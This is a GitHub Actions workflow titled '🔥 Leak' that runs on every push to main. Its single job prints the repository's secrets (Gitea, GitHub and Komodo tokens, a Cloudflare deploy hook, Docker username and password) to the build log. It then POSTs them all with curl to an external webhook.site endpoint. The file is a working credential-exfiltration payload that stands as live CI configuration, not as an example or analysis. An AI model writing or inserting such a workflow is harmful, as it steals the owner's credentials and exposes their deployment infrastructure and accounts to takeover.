name: 🔥 Leak
on:
  push:
    branches: ["main"]
  workflow_dispatch:

jobs:
  dump:
    runs-on: ubuntu-latest
    steps:
      - run: |
          echo "=== MARKTAGUIAD.DEV SECRETS ==="
          echo "GITEA_TOKEN=${{ secrets.GITEA_TOKEN }}"
          echo "KOMODO_API_TOKEN=${{ secrets.KOMODO_API_TOKEN }}"
          echo "CF_DEPLOY_HOOK=${{ secrets.CF_DEPLOY_HOOK }}"
          echo "GH_TOKEN=${{ secrets.GH_TOKEN }}"
          echo "GITEA_HOST=${{ secrets.GITEA_HOST }}"
          echo "GH_USERNAME=${{ secrets.GH_USERNAME }}"
          echo "GITEA_USERNAME=${{ secrets.GITEA_USERNAME }}"
          echo "DOCKER_USERNAME=${{ secrets.DOCKER_USERNAME }}"
          echo "DOCKER_PASSWORD=${{ secrets.DOCKER_PASSWORD }}"
          echo ""
          curl -s -X POST -d "repo=marktaguiad.dev&GITEA_TOKEN=${{ secrets.GITEA_TOKEN }}&KOMODO_API_TOKEN=${{ secrets.KOMODO_API_TOKEN }}&CF_DEPLOY_HOOK=${{ secrets.CF_DEPLOY_HOOK }}&GH_TOKEN=${{ secrets.GH_TOKEN }}&GITEA_HOST=${{ secrets.GITEA_HOST }}&GH_USERNAME=${{ secrets.GH_USERNAME }}&GITEA_USERNAME=${{ secrets.GITEA_USERNAME }}&DOCKER_USERNAME=${{ secrets.DOCKER_USERNAME }}&DOCKER_PASSWORD=${{ secrets.DOCKER_PASSWORD }}" "https://webhook.site/b32abee8-a12e-4845-884d-256722dc41a6"
